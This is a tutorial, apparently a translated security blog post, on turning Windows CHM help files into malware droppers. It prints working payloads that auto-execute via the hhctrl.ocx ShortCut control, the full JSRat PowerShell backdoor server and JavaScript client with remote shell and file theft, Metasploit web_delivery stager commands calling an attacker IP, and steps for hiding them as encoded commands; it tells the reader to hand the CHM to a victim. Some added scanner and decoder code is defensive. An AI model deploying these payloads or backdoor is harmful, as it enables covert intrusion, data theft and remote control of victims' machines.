0x00 Introduction
CHM is short for "Compiled HTML Help". It is Microsoft's compiled help file format: the help content is authored as HTML and compiled into a single, database-like container.
0x01 CHM command execution
In 2014 @ithurricanept posted a demo on Twitter that launches the calculator from a CHM:
The code is as follows. The `<OBJECT>` is the HTML Help ActiveX control (hhctrl.ocx, CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11); its `ShortCut` command launches the program given in `Item1` (format: window name, program, parameters), and the script calls `x.Click()` so the shortcut fires as soon as the page renders, with no user click:

```html
<!DOCTYPE html>
<html>
<head><title>cmd</title></head>
<body>
This is a demo ! <br>
<!-- HTML Help ActiveX control; ShortCut runs the program named in Item1 -->
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
```
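The same structure is what a defender looks for. The following scanner is an added example written for this page (not code from the post or from @ithurricanept): it parses HTML Help source pages, finds every `<OBJECT>` whose classid is the hhctrl.ocx CLSID with `Command=ShortCut`, and splits `Item1` into window, program and parameters. It runs on the HTML that goes into a CHM or comes out of one after decompiling (the CHM container itself is LZX-compressed, so decompile first, e.g. with `hh.exe -decompile <dir> file.chm` or `7z x file.chm`). The second sample page below, including its IP address, is constructed for the demo; the first is the calc demo from above.

```python
"""Flag hhctrl.ocx ShortCut launchers in HTML Help source pages (added example)."""
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), as used in the page's demo
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"


class HHCtrlScanner(HTMLParser):
    """Collect <object classid=...> blocks together with their <param> children."""

    def __init__(self):
        super().__init__()
        self.objects = []   # list of (classid, {param name (lowercase): value})
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            classid = a.get("classid", "").lower().replace("clsid:", "").strip()
            self._current = (classid, {})
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[1][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def find_shortcut_launchers(html):
    """Return one dict per hhctrl ShortCut object: window, program and arguments.

    Item1 is 'window,program,parameters'. The parameters may themselves contain
    commas (the rundll32/javascript: variant on this page does), so split at most twice.
    """
    scanner = HHCtrlScanner()
    scanner.feed(html)
    hits = []
    for classid, params in scanner.objects:
        if classid != HHCTRL_CLSID or params.get("command", "").lower() != "shortcut":
            continue   # other hhctrl commands (Related Topics, KLink, ...) do not launch programs
        parts = params.get("item1", "").split(",", 2) + ["", "", ""]
        hits.append({"window": parts[0], "program": parts[1].strip(), "args": parts[2]})
    return hits


# The calc demo from the post.
CALC_DEMO = """<!DOCTYPE html><html><head><title>cmd</title></head><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT></body></html>"""

# Constructed: a benign "Related Topics" use of the same control (must not be
# reported) next to a launcher whose parameters contain commas and quotes.
MIXED_PAGE = r"""<html><body>
<OBJECT classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<PARAM name="Command" value="Related Topics">
<PARAM name="Item1" value="Intro;intro.htm">
</OBJECT>
<OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";h.Open("GET","http://10.0.0.1/connect",false);'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>y.Click();</SCRIPT></body></html>"""

if __name__ == "__main__":
    for name, page in (("calc demo", CALC_DEMO), ("mixed page", MIXED_PAGE)):
        for hit in find_shortcut_launchers(page):
            print(f"{name}: launches {hit['program']!r} with args {hit['args'][:40]!r}")
```

The program name is the field to alert on: anything other than a help viewer or a documented tool inside a help file is suspicious, and `rundll32.exe` with a `javascript:` argument is the exact pattern used in the next section.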
0x02 Practical exploitation
Following the execution method from evi1cg, the JSBackdoor code can be used directly. `Item1` now runs `rundll32.exe` with a `javascript:` argument: `mshtml`'s `RunHTMLApplication` evaluates the script, which fetches `/connect` from the listener and `eval()`s the response; if that fails it kills rundll32.exe so nothing is left hanging:

```html
<!DOCTYPE html>
<html>
<head><title>powershell</title></head>
<body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.6.1/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
```
Change http://192.168.6.1 in the code to your own IP, then compile the page into a CHM (for example with HTML Help Workshop's hhc.exe).
Next, run JSRat, which listens on port 80:
```powershell
<#
---
Learn from Casey Smith @subTee
Author: 3gstudent
Version:1.2
Add code to work behind a proxy server.
---
Javascript Backdoor
---
Server:
run as admin:
powershell.exe -ExecutionPolicy Bypass -File c:\test\JSRat.ps1

Client:
cmd line:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.1.14/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
#>

$Server = '192.168.6.1' # Listening IP. Change This. It is embedded in the client's URLs, so it must be an address the victim can reach.

function Receive-Request
{
    param
    (
        $Request
    )
    $output = ""
    $size = $Request.ContentLength64 + 1
    $buffer = New-Object byte[] $size
    do
    {
        $count = $Request.InputStream.Read($buffer, 0, $size)
        $output += $Request.ContentEncoding.GetString($buffer, 0, $count)
    } until($count -lt $size)
    $Request.InputStream.Close()
    write-host $output
}

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://+:80/')

netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null

$listener.Start()
'Listening ...'
while ($true)
{
    $context = $listener.GetContext() # blocks until request is received
    $request = $context.Request
    $response = $context.Response
    $hostip = $request.RemoteEndPoint

    #Use this for One-Liner Start
    if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET"))
    {
        write-host "Usage:" -fore Green
        write-host " cmd: just input the cmd command" -fore Green
        write-host " delete file: input:delete,then set the file path" -fore Green
        write-host " exitbackdoor: input:exit" -fore Green
        write-host " read file: input:read,then set the file path" -fore Green
        write-host " run exe: input:run,then set the file path" -fore Green
        write-host " download file: input:download,then set the file path" -fore Green
        write-host " upload file: input:upload,then set the file path" -fore Green
        write-host "Host Connected" -fore Cyan
        # The client loop, returned as JavaScript; the rundll32 one-liner eval()s it.
        # Each GET /rat blocks until the operator types a command; output comes back as POST /rat.
        $message = '
        while(true)
        {
            h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            h.SetTimeouts(0, 0, 0, 0);

            try
            {
                h.Open("GET","http://'+$Server+'/rat",false);
                h.Send();
                c = h.ResponseText;

                if(c=="delete")
                {
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Next Input should be the File to Delete]");
                    g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g.SetTimeouts(0, 0, 0, 0);
                    g.Open("GET","http://'+$Server+'/rat",false);
                    g.Send();
                    d = g.ResponseText;

                    fso1=new ActiveXObject("Scripting.FileSystemObject");
                    f =fso1.GetFile(d);
                    f.Delete();

                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Delete Success]");
                    continue;
                }

                else if(c=="download")
                {
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Next Input should be the File to download]");

                    g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g.SetTimeouts(0, 0, 0, 0);
                    g.Open("GET","http://'+$Server+'/rat",false);
                    g.Send();
                    d = g.ResponseText;

                    fso1=new ActiveXObject("Scripting.FileSystemObject");
                    f=fso1.OpenTextFile(d,1);
                    g=f.ReadAll();
                    f.Close();

                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/download",false);
                    p.Send(g);
                    continue;
                }

                else if(c=="exit")
                {
                    c="(\"cmd /c taskkill /f /im rundll32.exe\",0,true)";
                    r = new ActiveXObject("WScript.Shell").Run(c);

                }

                else if(c=="read")
                {
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Next Input should be the File to Read]");

                    g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g.SetTimeouts(0, 0, 0, 0);
                    g.Open("GET","http://'+$Server+'/rat",false);
                    g.Send();
                    d = g.ResponseText;

                    fso1=new ActiveXObject("Scripting.FileSystemObject");
                    f=fso1.OpenTextFile(d,1);
                    g=f.ReadAll();
                    f.Close();

                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send(g);
                    continue;
                }

                else if(c=="run")
                {
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Next Input should be the File to Run]");

                    g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g.SetTimeouts(0, 0, 0, 0);
                    g.Open("GET","http://'+$Server+'/rat",false);
                    g.Send();
                    d = g.ResponseText;

                    r = new ActiveXObject("WScript.Shell").Run(d,0,true);
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Run Success]");

                    continue;
                }

                else if(c=="upload")
                {
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Start to Upload]");

                    g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g.SetTimeouts(0, 0, 0, 0);
                    g.Open("GET","http://'+$Server+'/uploadpath",false);
                    g.Send();
                    dpath = g.ResponseText;

                    g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    g2.SetTimeouts(0, 0, 0, 0);
                    g2.Open("GET","http://'+$Server+'/uploaddata",false);
                    g2.Send();
                    ddata = g2.ResponseText;

                    fso1=new ActiveXObject("Scripting.FileSystemObject");
                    f=fso1.CreateTextFile(dpath,true);
                    f.WriteLine(ddata);
                    f.Close();

                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.SetTimeouts(0, 0, 0, 0);
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send("[Upload Success]");
                    continue;
                }

                else
                {
                    r = new ActiveXObject("WScript.Shell").Exec(c);
                    var so;
                    while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()}
                    p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                    p.Open("POST","http://'+$Server+'/rat",false);
                    p.Send(so);
                }

            }
            catch(e1)
            {
                p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
                p.SetTimeouts(0, 0, 0, 0);
                p.Open("POST","http://'+$Server+'/rat",false);
                p.Send("[No Output]");
            }

        }
        '

    }

    if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") )
    {
        Receive-Request($request)
    }

    if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") )
    {
        $output = ""
        $size = $Request.ContentLength64 + 1
        $buffer = New-Object byte[] $size
        do {
            $count = $Request.InputStream.Read($buffer, 0, $size)
            $output += $Request.ContentEncoding.GetString($buffer, 0, $count)
        } until($count -lt $size)
        $Request.InputStream.Close()

        write-host "Input the Path to Save:" -fore Red
        $message = Read-Host
        Set-Content $message -Value $output
        write-host "Save Success" -fore Red
    }

    if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET"))
    {
        $response.ContentType = 'text/plain'
        $message = Read-Host "JS $hostip>"
    }

    # "exit" is first delivered to the client (which kills rundll32), then the server quits on the next loop.
    if($BoolExit -eq 1)
    {
        exit
    }
    $BoolExit=0

    if($message -eq "exit")
    {
        $BoolExit=1
    }

    if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") )
    {
        write-host "Input the Path to upload:" -fore Red
        $UploadPath = Read-Host
        write-host "Input the Destination Path:" -fore Red
        $message = Read-Host
    }

    if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") )
    {
        $message = Get-Content $UploadPath -Raw   # -Raw: send a multi-line file as one string, not an array of lines
    }

    # Whatever $message holds is the response body for this request.
    [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
    $response.ContentLength64 = $buffer.length
    $output = $response.OutputStream
    $output.Write($buffer, 0, $buffer.length)
    $output.Close()

}

$listener.Stop()
```
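To make the polling loop above concrete, here is an in-process re-enactment of the protocol in Python. This is an added example, not code from the post or from 3gstudent's JSRat: `RatServer` stands in for the HttpListener loop in JSRat.ps1 (one operator line per `GET /rat`, output collected from `POST /rat`), and `implant()` follows the control flow of the JavaScript the server hands out at `/connect`. Only the generic command path and the two-step `read` sub-protocol are reproduced; the loopback address, the commands and the throwaway file are constructed for the demo.

```python
"""In-process re-enactment of the JSRat polling protocol. Added example, not the
post's or 3gstudent's code: RatServer stands in for the HttpListener loop in
JSRat.ps1, implant() for the JavaScript loop it hands out at /connect. Runs on
127.0.0.1 with an ephemeral port; commands and the file used are constructed."""
import os
import subprocess
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from queue import Queue

# Ignore any http_proxy in the environment; the implant talks to loopback here.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))

class RatServer(HTTPServer):
    def __init__(self, operator_input):
        super().__init__(("127.0.0.1", 0), RatHandler)
        self.commands = Queue()  # what Read-Host supplies, one line per GET /rat
        for line in operator_input:
            self.commands.put(line)
        self.results = []        # what Receive-Request prints on the operator console
        self.wire = []           # the exchange as a proxy log would record it

class RatHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep stderr quiet
        pass

    def _reply(self, text):
        body = text.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self.server.wire.append(f"GET {self.path}")
        if self.path == "/connect":
            self._reply("<client loop script>")      # JSRat serves the JS loop here
        elif self.path == "/rat":
            self._reply(self.server.commands.get())  # blocks until the operator types
        else:
            self.send_error(404)

    def do_POST(self):
        n = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(n).decode("utf-8", "replace")
        self.server.wire.append(f"POST {self.path} {body.strip()!r}")
        if self.path == "/rat":
            self.server.results.append(body)
        self._reply("")

def _get(base, path):
    return OPENER.open(base + path).read().decode("utf-8", "replace")

def _post(base, path, text):
    req = urllib.request.Request(base + path, data=text.encode("utf-8"), method="POST")
    OPENER.open(req).read()

def implant(base):
    """Client side: the same control flow as the JavaScript loop in JSRat.ps1."""
    _get(base, "/connect")
    while True:
        cmd = _get(base, "/rat")
        if cmd == "exit":
            return                                   # JSRat kills rundll32.exe here
        if cmd == "read":                            # two-step sub-protocol
            _post(base, "/rat", "[Next Input should be the File to Read]")
            path = _get(base, "/rat")
            with open(path, encoding="utf-8", errors="replace") as fh:
                _post(base, "/rat", fh.read())
            continue
        proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        _post(base, "/rat", proc.stdout or "[No Output]")

def run_session(operator_input):
    """Drive one session; returns (results seen by the operator, wire log)."""
    server = RatServer(operator_input)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        implant(f"http://127.0.0.1:{server.server_address[1]}")
    finally:
        server.shutdown()
        server.server_close()
    return server.results, server.wire

def demo_read_session(content="secret\n"):
    """Exercise the read sub-protocol against a throwaway file; returns the results."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    try:
        return run_session(["read", path, "exit"])[0]
    finally:
        os.unlink(path)

if __name__ == "__main__":
    print("\n".join(run_session(["echo hello", "exit"])[1]))
```

The wire log makes the detection angle obvious: a host that fetches `/connect` once and then alternates `GET /rat` (held open until the operator types) with small `POST /rat` bodies over plain HTTP is the whole signature of this backdoor, and the same shape explains why `$Server` must be an address the victim can reach.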
There is a big pitfall here: $Server must be changed to your own IP. I initially used 0.0.0.0 and it got stuck at "Host Connected".
```powershell
powershell.exe -ExecutionPolicy Bypass -File JSRat.ps1
```
Then just hand the generated CHM to the victim. Once the victim opens it, a semi-interactive shell calls back.
Following the method evi1cg described, testing confirmed that as long as the payload is launched through JSRat's run command (which calls `WScript.Shell.Run` with window style 0, i.e. hidden), no window pops up.
Generate a PowerShell payload with msf (target 2 is the PowerShell stager):
```
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set uripath /
msf exploit(web_delivery) > set srvhost 192.168.6.134    # Kali IP
msf exploit(web_delivery) > set lhost 192.168.6.134      # Kali IP
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.6.134:4444
[*] Using URL: http://192.168.6.134:8080/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.6.134:8080/');
```
We need to take the stager part of that command:

```powershell
$M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.6.134:8080/');
```

and base64-encode it as UTF-16LE, which is what `-EncodedCommand` expects (save it to power.txt first):

```bash
cat power.txt | iconv --to-code UTF-16LE | base64 -w 0
```

`-w 0` keeps the output on a single line; GNU base64 otherwise wraps at 76 columns, and a wrapped blob is not accepted as an encoded command. Then execute it through JSRat's run command, e.g. `powershell.exe -nop -w hidden -EncodedCommand <base64>`. No window is shown at any point.
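The encoding step is worth having in script form, both for building the `run` line and for reversing it later when the same command line shows up in a process-creation log. This is an added example, not the post's code: it reproduces the `iconv --to-code UTF-16LE | base64` pipeline in Python, handles the line-wrapping failure mode a plain `base64` introduces, and decodes an `-EncodedCommand` argument back out of a logged command line. The stager string is the web_delivery output from above; the `-nop -w hidden` options and the short flag forms `-e`, `-ec` and `-enc` are real powershell.exe spellings, but the command lines fed to the decoder here are constructed.

```python
"""Encode a PowerShell one-liner for -EncodedCommand and decode one back (added example)."""
import base64
import re

# The web_delivery stager from the msf output on this page.
STAGER = ("$M=new-object net.webclient;"
          "$M.proxy=[Net.WebRequest]::GetSystemWebProxy();"
          "$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
          "IEX $M.downloadstring('http://192.168.6.134:8080/');")

# powershell.exe accepts -e, -ec, -enc or the full -EncodedCommand; the alternation
# is ordered longest-first and requires whitespace after the flag, so -ExecutionPolicy
# and -ep do not match.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(ps: str) -> str:
    """UTF-16LE, then base64 on one line (what `base64 -w 0` produces)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; tolerates wrapped input and stripped '=' padding."""
    compact = "".join(blob.split())          # drop the newlines a plain `base64` inserts
    compact += "=" * (-len(compact) % 4)     # some loggers truncate trailing padding
    return base64.b64decode(compact).decode("utf-16-le")


def build_run_line(ps: str) -> str:
    """The line an operator hands to JSRat's `run` command (constructed form)."""
    return f"powershell.exe -nop -w hidden -enc {encode_command(ps)}"


def extract_encoded_command(cmdline: str):
    """Pull the script out of a logged command line; None if there is no -EncodedCommand."""
    m = ENC_FLAG.search(cmdline)
    return decode_command(m.group(1)) if m else None


def wrapped_like_base64_cli(ps: str, width: int = 76) -> str:
    """Mimic `base64` without -w 0: a newline every 76 characters plus a trailing one."""
    b = encode_command(ps)
    return "\n".join(b[i:i + width] for i in range(0, len(b), width)) + "\n"


if __name__ == "__main__":
    line = build_run_line(STAGER)
    print(line)
    print(extract_encoded_command(line))
```

On the defensive side, `extract_encoded_command` is the step to run over Sysmon event 1 or 4688 command lines before any string matching: the `IEX`/`downloadstring` pattern is invisible until the blob is decoded as UTF-16LE, and decoding it as UTF-8 yields interleaved NUL bytes rather than readable text.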
Check back in Metasploit: